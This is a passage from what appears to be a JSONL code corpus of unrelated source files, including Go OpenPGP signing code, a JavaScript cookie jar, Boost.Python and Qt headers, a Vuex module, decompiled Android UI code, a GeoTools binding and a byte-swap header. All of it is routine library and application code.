s.CreationTime.Add(time.Duration(*s.KeyLifetimeSecs) * time.Second)\n\t}\n\n\treturn getExpiryDate(other).After(getExpiryDate(sig))\n}\n\n// buildHashSuffix constructs the HashSuffix member of sig in preparation for signing.\nfunc (sig *Signature) buildHashSuffix() (err error) {\n\thashedSubpacketsLen := subpacketsLength(sig.outSubpackets, true)\n\n\tvar ok bool\n\tl := 6 + hashedSubpacketsLen\n\tsig.HashSuffix = make([]byte, l+6)\n\tsig.HashSuffix[0] = 4\n\tsig.HashSuffix[1] = uint8(sig.SigType)\n\tsig.HashSuffix[2] = uint8(sig.PubKeyAlgo)\n\tsig.HashSuffix[3], ok = s2k.HashToHashId(sig.Hash)\n\tif !ok {\n\t\tsig.HashSuffix = nil\n\t\treturn errors.InvalidArgumentError(\"hash cannot be represented in OpenPGP: \" + strconv.Itoa(int(sig.Hash)))\n\t}\n\tsig.HashSuffix[4] = byte(hashedSubpacketsLen >> 8)\n\tsig.HashSuffix[5] = byte(hashedSubpacketsLen)\n\tserializeSubpackets(sig.HashSuffix[6:l], sig.outSubpackets, true)\n\ttrailer := sig.HashSuffix[l:]\n\ttrailer[0] = 4\n\ttrailer[1] = 0xff\n\ttrailer[2] = byte(l >> 24)\n\ttrailer[3] = byte(l >> 16)\n\ttrailer[4] = byte(l >> 8)\n\ttrailer[5] = byte(l)\n\treturn\n}\n\nfunc (sig *Signature) signPrepareHash(h hash.Hash) (digest []byte, err error) {\n\terr = sig.buildHashSuffix()\n\tif err != nil {\n\t\treturn\n\t}\n\n\th.Write(sig.HashSuffix)\n\tdigest = h.Sum(nil)\n\tcopy(sig.HashTag[:], digest)\n\treturn\n}\n\n// Sign signs a message with a private key. The hash, h, must contain\n// the hash of the message to be signed and will be mutated by this function.\n// On success, the signature is stored in sig. Call Serialize to write it out.\n// If config is nil, sensible defaults will be used.\nfunc (sig *Signature) Sign(h hash.Hash, priv *PrivateKey, config *Config) (err error) {\n\tsigner, hashIsSigner := h.(Signer)\n\n\tif !hashIsSigner && (priv == nil || priv.PrivateKey == nil) {\n\t\terr = errors.InvalidArgumentError(\"attempting to sign with nil PrivateKey\")\n\t\treturn\n\t}\n\n\tsig.outSubpackets = sig.buildSubpackets()\n\tdigest, err := sig.signPrepareHash(h)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tif hashIsSigner {\n\t\terr = signer.Sign(sig)\n\t\treturn\n\t}\n\n\t// Parameter check, if this is wrong we will make a signature but\n\t// not serialize it later.\n\tif sig.PubKeyAlgo != priv.PubKeyAlgo {\n\t\terr = errors.InvalidArgumentError(\"signature pub key algo does not match priv key\")\n\t\treturn\n\t}\n\n\tswitch priv.PubKeyAlgo {\n\tcase PubKeyAlgoRSA, PubKeyAlgoRSASignOnly:\n\t\tsig.RSASignature.bytes, err = rsa.SignPKCS1v15(config.Random(), priv.PrivateKey.(*rsa.PrivateKey), sig.Hash, digest)\n\t\tsig.RSASignature.bitLength = uint16(8 * len(sig.RSASignature.bytes))\n\tcase PubKeyAlgoDSA:\n\t\tdsaPriv := priv.PrivateKey.(*dsa.PrivateKey)\n\n\t\t// Need to truncate hashBytes to match FIPS 186-3 section 4.6.\n\t\tsubgroupSize := (dsaPriv.Q.BitLen() + 7) / 8\n\t\tif len(digest) > subgroupSize {\n\t\t\tdigest = digest[:subgroupSize]\n\t\t}\n\t\tr, s, err := dsa.Sign(config.Random(), dsaPriv, digest)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tsig.DSASigR.bytes = r.Bytes()\n\t\tsig.DSASigR.bitLength = uint16(8 * len(sig.DSASigR.bytes))\n\t\tsig.DSASigS.bytes = s.Bytes()\n\t\tsig.DSASigS.bitLength = uint16(8 * len(sig.DSASigS.bytes))\n\tcase PubKeyAlgoECDSA:\n\t\tr, s, err := ecdsa.Sign(config.Random(), priv.PrivateKey.(*ecdsa.PrivateKey), digest)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tsig.ECDSASigR = FromBig(r)\n\t\tsig.ECDSASigS = FromBig(s)\n\tcase PubKeyAlgoEdDSA:\n\t\tr, s, err := priv.PrivateKey.(*EdDSAPrivateKey).Sign(digest)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tsig.EdDSASigR = FromBytes(r)\n\t\tsig.EdDSASigS = FromBytes(s)\n\tdefault:\n\t\terr = errors.UnsupportedError(\"public key algorithm for signing: \" + strconv.Itoa(int(priv.PubKeyAlgo)))\n\t}\n\n\treturn\n}\n\n// SignUserId computes a signature from priv, asserting that pub is a valid\n// key for the identity id. On success, the signature is stored in sig. Call\n// Serialize to write it out.\n// If config is nil, sensible defaults will be used.\nfunc (sig *Signature) SignUserId(id string, pub *PublicKey, priv *PrivateKey, config *Config) error {\n\th, err := userIdSignatureHash(id, pub, sig.Hash)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn sig.Sign(h, priv, config)\n}\n\n// SignUserIdWithSigner computes a signature from priv, asserting that pub is a\n// valid key for the identity id. On success, the signature is stored in sig.\n// Call Serialize to write it out.\n// If config is nil, sensible defaults will be used.\nfunc (sig *Signature) SignUserIdWithSigner(id string, pub *PublicKey, s Signer, config *Config) error {\n\tupdateUserIdSignatureHash(id, pub, s)\n\n\treturn sig.Sign(s, nil, config)\n}\n\n// SignKey computes a signature from priv, asserting that pub is a subkey. On\n// success, the signature is stored in sig. Call Serialize to write it out.\n// If config is nil, sensible defaults will be used.\nfunc (sig *Signature) SignKey(pub *PublicKey, priv *PrivateKey, config *Config) error {\n\th, err := keySignatureHash(&priv.PublicKey, pub, sig.Hash)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn sig.Sign(h, priv, config)\n}\n\n// SignKeyWithSigner computes a signature using s, asserting that\n// signeePubKey is a subkey. On success, the signature is stored in sig. Call\n// Serialize to write it out. If config is nil, sensible defaults will be used.\nfunc (sig *Signature) SignKeyWithSigner(signeePubKey *PublicKey, signerPubKey *PublicKey, s Signer, config *Config) error {\n\tupdateKeySignatureHash(signerPubKey, signeePubKey, s)\n\n\treturn sig.Sign(s, nil, config)\n}\n\n// CrossSignKey creates PrimaryKeyBinding signature in sig.EmbeddedSignature by\n// signing `primary` key's hash using `priv` subkey private key. Primary public\n// key is the `signee` here.\nfunc (sig *Signature) CrossSignKey(primary *PublicKey, priv *PrivateKey, config *Config) error {\n\tif len(sig.outSubpackets) > 0 {\n\t\treturn fmt.Errorf(\"outSubpackets already exists, looks like CrossSignKey was called after Sign\")\n\t}\n\n\tsig.EmbeddedSignature = &Signature{\n\t\tCreationTime: sig.CreationTime,\n\t\tSigType: SigTypePrimaryKeyBinding,\n\t\tPubKeyAlgo: priv.PubKeyAlgo,\n\t\tHash: sig.Hash,\n\t}\n\n\th, err := keySignatureHash(primary, &priv.PublicKey, sig.Hash)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn sig.EmbeddedSignature.Sign(h, priv, config)\n}\n\n// Serialize marshals sig to w. Sign, SignUserId or SignKey must have been\n// called first.\nfunc (sig *Signature) Serialize(w io.Writer) (err error) {\n\tif len(sig.outSubpackets) == 0 {\n\t\tsig.outSubpackets = sig.rawSubpackets\n\t}\n\tif sig.RSASignature.bytes == nil &&\n\t\tsig.DSASigR.bytes == nil &&\n\t\tsig.ECDSASigR.bytes == nil &&\n\t\tsig.EdDSASigR.bytes == nil {\n\t\treturn errors.InvalidArgumentError(\"Signature: need to call Sign, SignUserId or SignKey before Serialize\")\n\t}\n\n\tsigLength := 0\n\tswitch sig.PubKeyAlgo {\n\tcase PubKeyAlgoRSA, PubKeyAlgoRSASignOnly:\n\t\tsigLength = 2 + len(sig.RSASignature.bytes)\n\tcase PubKeyAlgoDSA:\n\t\tsigLength = 2 + len(sig.DSASigR.bytes)\n\t\tsigLength += 2 + len(sig.DSASigS.bytes)\n\tcase PubKeyAlgoEdDSA:\n\t\tsigLength = 2 + len(sig.EdDSASigR.bytes)\n\t\tsigLength += 2 + len(sig.EdDSASigS.bytes)\n\tcase PubKeyAlgoECDSA:\n\t\tsigLength = 2 + len(sig.ECDSASigR.bytes)\n\t\tsigLength += 2 + len(sig.ECDSASigS.bytes)\n\tdefault:\n\t\tpanic(\"impossible\")\n\t}\n\n\tunhashedSubpacketsLen := subpacketsLength(sig.outSubpackets, false)\n\tlength := len(sig.HashSuffix) - 6 /* trailer not included */ +\n\t\t2 /* length of unhashed subpackets */ + unhashedSubpacketsLen +\n\t\t2 /* hash tag */ + sigLength\n\terr = serializeHeader(w, packetTypeSignature, length)\n\tif err != nil {\n\t\treturn\n\t}\n\n\t_, err = w.Write(sig.HashSuffix[:len(sig.HashSuffix)-6])\n\tif err != nil {\n\t\treturn\n\t}\n\n\tunhashedSubpackets := make([]byte, 2+unhashedSubpacketsLen)\n\tunhashedSubpackets[0] = byte(unhashedSubpacketsLen >> 8)\n\tunhashedSubpackets[1] = byte(unhashedSubpacketsLen)\n\tserializeSubpackets(unhashedSubpackets[2:], sig.outSubpackets, false)\n\n\t_, err = w.Write(unhashedSubpackets)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, err = w.Write(sig.HashTag[:])\n\tif err != nil {\n\t\treturn\n\t}\n\n\tswitch sig.PubKeyAlgo {\n\tcase PubKeyAlgoRSA, PubKeyAlgoRSASignOnly:\n\t\terr = writeMPIs(w, sig.RSASignature)\n\tcase PubKeyAlgoDSA:\n\t\terr = writeMPIs(w, sig.DSASigR, sig.DSASigS)\n\tcase PubKeyAlgoEdDSA:\n\t\terr = writeMPIs(w, sig.EdDSASigR, sig.EdDSASigS)\n\tcase PubKeyAlgoECDSA:\n\t\terr = writeMPIs(w, sig.ECDSASigR, sig.ECDSASigS)\n\tdefault:\n\t\tpanic(\"impossible\")\n\t}\n\treturn\n}\n\n// outputSubpacket represents a subpacket to be marshaled.\ntype outputSubpacket struct {\n\thashed bool // true if this subpacket is in the hashed area.\n\tsubpacketType signatureSubpacketType\n\tisCritical bool\n\tcontents []byte\n}\n\nfunc (sig *Signature) buildSubpackets() (subpackets []outputSubpacket) {\n\tcreationTime := make([]byte, 4)\n\tbinary.BigEndian.PutUint32(creationTime, uint32(sig.CreationTime.Unix()))\n\tsubpackets = append(subpackets, outputSubpacket{true, creationTimeSubpacket, false, creationTime})\n\n\tif sig.IssuerKeyId != nil {\n\t\tkeyId := make([]byte, 8)\n\t\tbinary.BigEndian.PutUint64(keyId, *sig.IssuerKeyId)\n\t\tsubpackets = append(subpackets, outputSubpacket{true, issuerSubpacket, false, keyId})\n\t}\n\n\tif sig.SigLifetimeSecs != nil && *sig.SigLifetimeSecs != 0 {\n\t\tsigLifetime := make([]byte, 4)\n\t\tbinary.BigEndian.PutUint32(sigLifetime, *sig.SigLifetimeSecs)\n\t\tsubpackets = append(subpackets, outputSubpacket{true, signatureExpirationSubpacket, true, sigLifetime})\n\t}\n\n\t// Key flags may only appear in self-signatures or certification signatures.\n\n\tif sig.FlagsValid {\n\t\tsubpackets = append(subpackets, outputSubpacket{true, keyFlagsSubpacket, false, []byte{sig.GetKeyFlags().BitField}})\n\t}\n\n\t// The following subpackets may only appear in self-signatures\n\n\tif sig.KeyLifetimeSecs != nil && *sig.KeyLifetimeSecs != 0 {\n\t\tkeyLifetime := make([]byte, 4)\n\t\tbinary.BigEndian.PutUint32(keyLifetime, *sig.KeyLifetimeSecs)\n\t\tsubpackets = append(subpackets, outputSubpacket{true, keyExpirationSubpacket, true, keyLifetime})\n\t}\n\n\tif sig.IsPrimaryId != nil && *sig.IsPrimaryId {\n\t\tsubpackets = append(subpackets, outputSubpacket{true, primaryUserIdSubpacket, false, []byte{1}})\n\t}\n\n\tif len(sig.PreferredSymmetric) > 0 {\n\t\tsubpackets = append(subpackets, outputSubpacket{true, prefSymmetricAlgosSubpacket, false, sig.PreferredSymmetric})\n\t}\n\n\tif len(sig.PreferredHash) > 0 {\n\t\tsubpackets = append(subpackets, outputSubpacket{true, prefHashAlgosSubpacket, false, sig.PreferredHash})\n\t}\n\n\tif len(sig.PreferredCompression) > 0 {\n\t\tsubpackets = append(subpackets, outputSubpacket{true, prefCompressionSubpacket, false, sig.PreferredCompression})\n\t}\n\n\tif sig.EmbeddedSignature != nil {\n\t\tbuf := bytes.NewBuffer(nil)\n\t\tif err := sig.EmbeddedSignature.Serialize(buf); err == nil {\n\t\t\tbyteContent := buf.Bytes()[2:] // skip 2-byte length header\n\t\t\tsubpackets = append(subpackets, outputSubpacket{false, embeddedSignatureSubpacket, true, byteContent})\n\t\t}\n\t}\n\n\treturn\n}\n\nfunc (sig *Signature) GetKeyFlags() (ret KeyFlagBits) {\n\tif !sig.FlagsValid {\n\t\treturn ret\n\t}\n\n\tret.Valid = true\n\tif sig.FlagCertify {\n\t\tret.BitField |= KeyFlagCertify\n\t}\n\tif sig.FlagSign {\n\t\tret.BitField |= KeyFlagSign\n\t}\n\tif sig.FlagEncryptCommunications {\n\t\tret.BitField |= KeyFlagEncryptCommunications\n\t}\n\tif sig.FlagEncryptStorage {\n\t\tret.BitField |= KeyFlagEncryptStorage\n\t}\n\treturn ret\n}\n\nfunc (f *KeyFlagBits) HasFlagCertify() bool {\n\treturn f.BitField&KeyFlagCertify != 0\n}\n\nfunc (f *KeyFlagBits) HasFlagSign() bool {\n\treturn f.BitField&KeyFlagSign != 0\n}\n\nfunc (f *KeyFlagBits) HasFlagEncryptCommunications() bool {\n\treturn f.BitField&KeyFlagEncryptCommunications != 0\n}\n\nfunc (f *KeyFlagBits) HasFlagEncryptStorage() bool {\n\treturn f.BitField&KeyFlagEncryptStorage != 0\n}\n\nfunc (f *KeyFlagBits) Merge(other KeyFlagBits) {\n\tif other.Valid {\n\t\tf.Valid = true\n\t\tf.BitField |= other.BitField\n\t}\n}\n"} {"text": "'use strict'\n\nvar tough = require('tough-cookie')\n\nvar Cookie = tough.Cookie\n , CookieJar = tough.CookieJar\n\n\nexports.parse = function(str) {\n if (str && str.uri) {\n str = str.uri\n }\n if (typeof str !== 'string') {\n throw new Error('The cookie function only accepts STRING as param')\n }\n return Cookie.parse(str, {loose: true})\n}\n\n// Adapt the sometimes-Async api of tough.CookieJar to our requirements\nfunction RequestJar(store) {\n var self = this\n self._jar = new CookieJar(store, {looseMode: true})\n}\nRequestJar.prototype.setCookie = function(cookieOrStr, uri, options) {\n var self = this\n return self._jar.setCookieSync(cookieOrStr, uri, options || {})\n}\nRequestJar.prototype.getCookieString = function(uri) {\n var self = this\n return self._jar.getCookieStringSync(uri)\n}\nRequestJar.prototype.getCookies = function(uri) {\n var self = this\n return self._jar.getCookiesSync(uri)\n}\n\nexports.jar = function(store) {\n return new RequestJar(store)\n}\n"} {"text": "#ifndef BOOST_PP_IS_ITERATING\n// Copyright David Abrahams 2002.\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n# ifndef TYPE_LIST_IMPL_DWA2002913_HPP\n# define TYPE_LIST_IMPL_DWA2002913_HPP\n\n# include \n\n# include \n# include \n# include \n# include \n# include \n# include \n# include \n\nnamespace boost { namespace python { namespace detail { \n\ntemplate \nstruct type_list\n : BOOST_PP_CAT(mpl::vector,BOOST_PYTHON_LIST_SIZE)\n{\n};\n\n# define BOOST_PP_ITERATION_PARAMS_1 \\\n (3, (0, BOOST_PP_DEC(BOOST_PYTHON_LIST_SIZE), ))\n# include BOOST_PP_ITERATE()\n\n\n}}} // namespace boost::python::detail\n\n# endif // TYPE_LIST_IMPL_DWA2002913_HPP\n\n#else // BOOST_PP_IS_ITERATING\n\n# define N BOOST_PP_ITERATION()\n# define BOOST_PYTHON_VOID_ARGS BOOST_PP_SUB_D(1,BOOST_PYTHON_LIST_SIZE,N)\n\ntemplate <\n BOOST_PP_ENUM_PARAMS_Z(1, N, class T)\n >\nstruct type_list<\n BOOST_PP_ENUM_PARAMS_Z(1, N, T)\n BOOST_PP_COMMA_IF(N)\n BOOST_PP_ENUM(\n BOOST_PYTHON_VOID_ARGS, BOOST_PYTHON_FIXED, mpl::void_)\n >\n : BOOST_PP_CAT(mpl::vector,N)\n{\n};\n\n# undef BOOST_PYTHON_VOID_ARGS\n# undef N\n\n#endif // BOOST_PP_IS_ITERATING \n"} {"text": "Template: lcl-utils${PACKAGESUFFIX}/rename_cfg\nType: boolean\nDefault: true\n_Description: Rename \"/etc/lazarus\" to \"/etc/lazarus.bak\"?\n The Lazarus suite now supports keeping multiple versions installed\n at the same time and using the alternatives system to set proper\n defaults. Normally, the latest version of any component is used.\n .\n To use the alternatives system on the system-wide configuration\n of the Lazarus suite, /etc/lazarus needs to be under control of the\n alternatives system. Currently there is a real directory at\n /etc/lazarus, probably from a previous installation. In order to\n start using the alternatives system on the configuration you must\n accept renaming \"/etc/lazarus\". If you don't, you will need to\n review the configuration on every version update of Lazarus as,\n unfortunately, the configuration files are not always\n backward-compatible. Also switching between different versions\n might need more intervention.\n .\n If you have made changes to your configuration files, you will\n probably need to review them and apply them to all versioned\n configurations, as they will not automatically propagate.\n"} {"text": "import { Module } from 'vuex'\nimport Vue from 'Vue'\nimport { State as RootState } from '../..'\n\nimport { propLens, over, set } from '../../../shims/vuex-lens'\nconst imagesLen = propLens('images')\n\nexport class State {\n images: any[] = []\n all = 1\n page = 1\n}\n\nconst Index: Module = {\n namespaced: true,\n state: new State(),\n mutations: {\n PUSH_IMAGES: (state, payload) => {\n over(imagesLen, (images: any) => R.concat(images, payload), state)\n },\n SET_IMAGES: (state, payload) => {\n set(imagesLen, payload, state)\n },\n ALL_PAGE: (state, payload) => {\n state.all = parseInt(payload)\n },\n PAGE: (state, payload) => {\n state.page = parseInt(payload)\n }\n },\n actions: {\n setImages({ commit }, images) {\n commit('SET_IMAGES', images.data)\n commit('ALL_PAGE', images.allPage)\n commit('PAGE', images.currentPage)\n },\n pushImages({ commit }, images) {\n commit('PUSH_IMAGES', images.data)\n commit('ALL_PAGE', images.allPage)\n commit('PAGE', images.currentPage)\n }\n }\n}\n\nexport default Index\n"} {"text": "//==================================================================================\n// Copyright (c) 2016 , Advanced Micro Devices, Inc. All rights reserved.\n//\n/// \\author AMD Developer Tools Team\n/// \\file afLineEdit.h\n///\n//==================================================================================\n\n#ifndef __AFLINEEDIT_H\n#define __AFLINEEDIT_H\n\n// Qt\n#include \n\n\n// Local:\n#include \n\n\n// ----------------------------------------------------------------------------------\n// Class Name: afLineEdit\n// General Description: This class inherits QLineEdit. Use this class when a user edit\n// completion is required. Make sure to store a unique object name.\n// This object name is used to store the edit history in the framework.\n// ----------------------------------------------------------------------------------\nclass AF_API afLineEdit : public QLineEdit\n{\n Q_OBJECT\n\npublic:\n\n /// Constructor:\n afLineEdit(const QString& objectName, QWidget* pParent = nullptr);\n afLineEdit(const QString& objectName, const QString& contents, QWidget* pParent = nullptr);\n\n /// Destructor:\n ~afLineEdit();\n\nprotected slots:\n\n /// Is handling the editing finished signal:\n void OnEditFinished();\n\nprivate:\n\n /// Initializes the line edit completer:\n void InitilaizeCompleter();\n\n\n};\n\n#endif //__AFLINEEDIT_H\n\n"} {"text": "package com.tencent.mm.plugin.sns.storage.AdLandingPagesStorage.AdLandingPageComponent.component;\n\nimport android.content.Context;\nimport android.view.View;\nimport android.view.ViewGroup;\nimport android.view.ViewGroup.LayoutParams;\nimport android.view.ViewGroup.MarginLayoutParams;\nimport android.widget.ScrollView;\nimport com.tencent.matrix.trace.core.AppMethodBeat;\nimport com.tencent.mm.plugin.sns.storage.AdLandingPagesStorage.AdLandingPageComponent.component.widget.a;\nimport com.tencent.mm.plugin.sns.storage.AdLandingPagesStorage.AdLandingPageComponent.p;\nimport com.tencent.mm.plugin.sns.storage.AdLandingPagesStorage.AdLandingPageComponent.r;\nimport com.tencent.mm.plugin.sns.storage.AdLandingPagesStorage.l;\nimport com.tencent.mm.ui.base.CustomScrollView;\nimport com.tencent.mm.ui.widget.RoundedCornerRelativeLayout;\nimport java.util.ArrayList;\nimport java.util.List;\n\npublic final class n extends a {\n List bnR = new ArrayList();\n private l qZg;\n private p ral;\n private CustomScrollView ram;\n\n public n(Context context, p pVar, ViewGroup viewGroup) {\n super(context, pVar, viewGroup);\n AppMethodBeat.i(37153);\n this.ral = pVar;\n AppMethodBeat.o(37153);\n }\n\n /* Access modifiers changed, original: protected|final */\n public final void cpp() {\n AppMethodBeat.i(37154);\n if (this.qZg == null) {\n this.qZg = new l(this.ral.bnR, this.context, this.ram);\n this.qZg.aZ();\n this.bnR = cpt();\n } else {\n this.qZg.dl(this.ral.bnR);\n }\n if (getGravity() == 0) {\n LayoutParams layoutParams = this.contentView.getLayoutParams();\n if (layoutParams instanceof MarginLayoutParams) {\n ((MarginLayoutParams) layoutParams).setMargins((int) this.qZo.qWS, (int) this.qZo.qWQ, (int) this.qZo.qWT, (int) this.qZo.qWR);\n }\n this.contentView.setLayoutParams(layoutParams);\n }\n AppMethodBeat.o(37154);\n }\n\n /* Access modifiers changed, original: protected|final */\n public final View cpr() {\n AppMethodBeat.i(37155);\n RoundedCornerRelativeLayout roundedCornerRelativeLayout = new RoundedCornerRelativeLayout(this.context);\n this.ram = new CustomScrollView(this.context);\n this.ram.setOverScrollMode(2);\n this.ram.setHorizontalScrollBarEnabled(false);\n this.ram.setVerticalScrollBarEnabled(false);\n this.ram.setOnScrollChangeListener(new CustomScrollView.a() {\n public final void a(ScrollView scrollView, int i, int i2) {\n AppMethodBeat.i(37152);\n for (h hVar : n.this.bnR) {\n if (hVar.cpx()) {\n hVar.cpa();\n hVar.cpc();\n } else {\n hVar.cpb();\n }\n }\n AppMethodBeat.o(37152);\n }\n });\n roundedCornerRelativeLayout.setBackgroundColor(this.backgroundColor);\n roundedCornerRelativeLayout.addView(this.ram);\n roundedCornerRelativeLayout.setRadius((float) this.ral.qWN);\n AppMethodBeat.o(37155);\n return roundedCornerRelativeLayout;\n }\n\n public final void cpa() {\n AppMethodBeat.i(37156);\n for (h hVar : this.bnR) {\n if (hVar.cpx()) {\n hVar.cpa();\n }\n }\n super.cpa();\n AppMethodBeat.o(37156);\n }\n\n public final void cpb() {\n AppMethodBeat.i(37157);\n for (h cpb : this.bnR) {\n cpb.cpb();\n }\n super.cpb();\n AppMethodBeat.o(37157);\n }\n\n public final void cpc() {\n AppMethodBeat.i(37158);\n for (h hVar : this.bnR) {\n if (hVar.cpx()) {\n hVar.cpc();\n }\n }\n super.cpc();\n AppMethodBeat.o(37158);\n }\n\n public final void cps() {\n AppMethodBeat.i(37159);\n for (h hVar : this.bnR) {\n if (hVar.cpx()) {\n hVar.cpa();\n hVar.cpc();\n } else {\n hVar.cpb();\n }\n }\n AppMethodBeat.o(37159);\n }\n\n public final void coZ() {\n AppMethodBeat.i(37160);\n super.coZ();\n for (h coZ : this.bnR) {\n coZ.coZ();\n }\n AppMethodBeat.o(37160);\n }\n\n public final List cpt() {\n AppMethodBeat.i(37161);\n ArrayList arrayList = new ArrayList(this.qZg.cqa());\n AppMethodBeat.o(37161);\n return arrayList;\n }\n\n public final void a(r rVar) {\n AppMethodBeat.i(37162);\n if (rVar instanceof p) {\n this.ral = (p) rVar;\n }\n super.a(rVar);\n AppMethodBeat.o(37162);\n }\n}\n"} {"text": "//\n// HCPXmlConfig.m\n//\n// Created by Nikolay Demyankov on 07.08.15.\n//\n\n#import \"HCPXmlConfig.h\"\n#import \"HCPXmlConfigParser.h\"\n#import \"HCPXmlTags.h\"\n\n@implementation HCPXmlConfig\n\n- (instancetype)init {\n self = [super init];\n if (self) {\n _allowUpdatesAutoDownload = YES;\n _allowUpdatesAutoInstallation = YES;\n _configUrl = nil;\n _nativeInterfaceVersion = 1;\n }\n \n return self;\n}\n\n- (void)mergeOptionsFromJS:(NSDictionary *)jsOptions {\n if (jsOptions[kHCPConfigFileXmlTag]) {\n self.configUrl = [NSURL URLWithString:jsOptions[kHCPConfigFileXmlTag]];\n }\n \n if (jsOptions[kHCPAutoInstallXmlTag]) {\n self.allowUpdatesAutoInstallation = [(NSNumber *)jsOptions[kHCPAutoInstallXmlTag] boolValue];\n }\n \n if (jsOptions[kHCPAutoDownloadXmlTag]) {\n self.allowUpdatesAutoDownload = [(NSNumber *)jsOptions[kHCPAutoDownloadXmlTag] boolValue];\n }\n}\n\n\n+ (instancetype)loadFromCordovaConfigXml {\n return [HCPXmlConfigParser parse];\n}\n\n@end"} {"text": "/*\n * GeoTools - The Open Source Java GIS Toolkit\n * http://geotools.org\n *\n * (C) 2019, Open Source Geospatial Foundation (OSGeo)\n *\n * This library is free software; you can redistribute it and/or\n * modify it under the terms of the GNU Lesser General Public\n * License as published by the Free Software Foundation;\n * version 2.1 of the License.\n *\n * This library is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n * Lesser General Public License for more details.\n *\n */\n\npackage org.geotools.wcs.bindings;\n\nimport javax.xml.namespace.QName;\nimport org.geotools.gml3.GML;\nimport org.geotools.temporal.object.DefaultInstant;\nimport org.geotools.temporal.object.DefaultPeriod;\nimport org.geotools.wcs.WCS;\nimport org.geotools.xsd.AbstractComplexBinding;\nimport org.geotools.xsd.ElementInstance;\nimport org.geotools.xsd.Node;\nimport org.opengis.temporal.Instant;\nimport org.opengis.temporal.Period;\nimport org.opengis.temporal.Position;\nimport org.w3c.dom.Document;\nimport org.w3c.dom.Element;\n\n/**\n * Binding object for the type http://www.opengis.net/wcs:TimePeriodType.\n *\n *

\n *\n *

\n *  \n *  <complexType name="TimePeriodType">\n *      <annotation>\n *          <documentation>This is a variation of the GML TimePeriod, which allows the beginning and end of a time-period to be expressed in short-form inline using the begin/endPosition element, which allows an identifiable TimeInstant to be defined simultaneously with using it, or by reference, using xlinks on the begin/end elements. </documentation>\n *      </annotation>\n *      <sequence>\n *          <element name="beginPosition" type="gml:TimePositionType"/>\n *          <element name="endPosition" type="gml:TimePositionType"/>\n *          <element minOccurs="0" name="timeResolution" type="gml:TimeDurationType"/>\n *      </sequence>\n *      <attribute default="#ISO-8601" name="frame" type="anyURI" use="optional"/>\n *  </complexType>\n *\n * \n *  
\n *\n * @generated\n */\npublic class TimePeriodTypeBinding extends AbstractComplexBinding {\n\n /** @generated */\n public QName getTarget() {\n return WCS.TimePeriodType;\n }\n\n /**\n *\n * \n * \n *\n * @generated modifiable\n */\n public Class getType() {\n return Period.class;\n }\n\n /**\n *\n * \n * \n *\n * @generated modifiable\n */\n public Object parse(ElementInstance instance, Node node, Object value) throws Exception {\n\n Instant begining = new DefaultInstant((Position) node.getChild(\"beginPosition\").getValue());\n Instant ending = new DefaultInstant((Position) node.getChild(\"endPosition\").getValue());\n\n Period timePeriod = new DefaultPeriod(begining, ending);\n\n return timePeriod;\n }\n\n /*\n * (non-Javadoc)\n *\n * @see org.geotools.xsd.AbstractComplexBinding#encode(java.lang.Object,\n * org.w3c.dom.Document, org.w3c.dom.Element)\n */\n @Override\n public Element encode(Object object, Document document, Element value) throws Exception {\n Period timePeriod = (Period) object;\n\n if (timePeriod == null) {\n value.appendChild(document.createElementNS(GML.NAMESPACE, GML.Null.getLocalPart()));\n }\n\n return null;\n }\n\n public Object getProperty(Object object, QName name) {\n Period timePeriod = (Period) object;\n\n if (timePeriod == null) {\n return null;\n }\n\n if (name.getLocalPart().equals(\"beginPosition\")) {\n return timePeriod.getBeginning().getPosition();\n }\n\n if (name.getLocalPart().equals(\"endPosition\")) {\n return timePeriod.getEnding().getPosition();\n }\n\n return null;\n }\n}\n"} {"text": "===========================\n User Guide for github3.py\n===========================\n\nThis section of our documentation is intended to guide you, the user, through\nvarious ways of using the library and to introduce you to some high-level\nconcepts in the library.\n\n\n.. toctree::\n :maxdepth: 2\n\n getting-started\n repositories\n"} {"text": "/*\n * Portions of this file are copyright Rebirth contributors and licensed as\n * described in COPYING.txt.\n * Portions of this file are copyright Parallax Software and licensed\n * according to the Parallax license below.\n * See COPYING.txt for license details.\n\nTHE COMPUTER CODE CONTAINED HEREIN IS THE SOLE PROPERTY OF PARALLAX\nSOFTWARE CORPORATION (\"PARALLAX\"). PARALLAX, IN DISTRIBUTING THE CODE TO\nEND-USERS, AND SUBJECT TO ALL OF THE TERMS AND CONDITIONS HEREIN, GRANTS A\nROYALTY-FREE, PERPETUAL LICENSE TO SUCH END-USERS FOR USE BY SUCH END-USERS\nIN USING, DISPLAYING, AND CREATING DERIVATIVE WORKS THEREOF, SO LONG AS\nSUCH USE, DISPLAY OR CREATION IS FOR NON-COMMERCIAL, ROYALTY OR REVENUE\nFREE PURPOSES. IN NO EVENT SHALL THE END-USER USE THE COMPUTER CODE\nCONTAINED HEREIN FOR REVENUE-BEARING PURPOSES. THE END-USER UNDERSTANDS\nAND AGREES TO THE TERMS HEREIN AND ACCEPTS THE SAME BY USE OF THIS FILE.\nCOPYRIGHT 1993-1999 PARALLAX SOFTWARE CORPORATION. ALL RIGHTS RESERVED.\n*/\n\n/*\n *\n * code to swap bytes because of big/little endian problems.\n * contains the macros:\n * SWAP{INT64,INT,SHORT}(x): returns a swapped version of x\n * INTEL_{INT64,INT,SHORT}(x): returns x after conversion to/from little endian\n * GET_INTEL_{INT64,INT,SHORT}(src): gets value from little-endian buffer src\n * PUT_INTEL_{INT64,INT,SHORT}(dest, src): puts src into little-endian buffer dest\n *\n * the GET/PUT macros are safe to use on platforms which segfault on unaligned word access\n *\n */\n\n#pragma once\n\n#include \n#include // for memcpy\n#include \n#include \"dxxsconf.h\"\n#include \"pstypes.h\"\n\nstatic constexpr uint16_t SWAPSHORT(const uint16_t &x)\n{\n#ifdef DXX_HAVE_BUILTIN_BSWAP16\n\treturn __builtin_bswap16(x);\n#else\n\treturn (x << 8) | (x >> 8);\n#endif\n}\n\nstatic 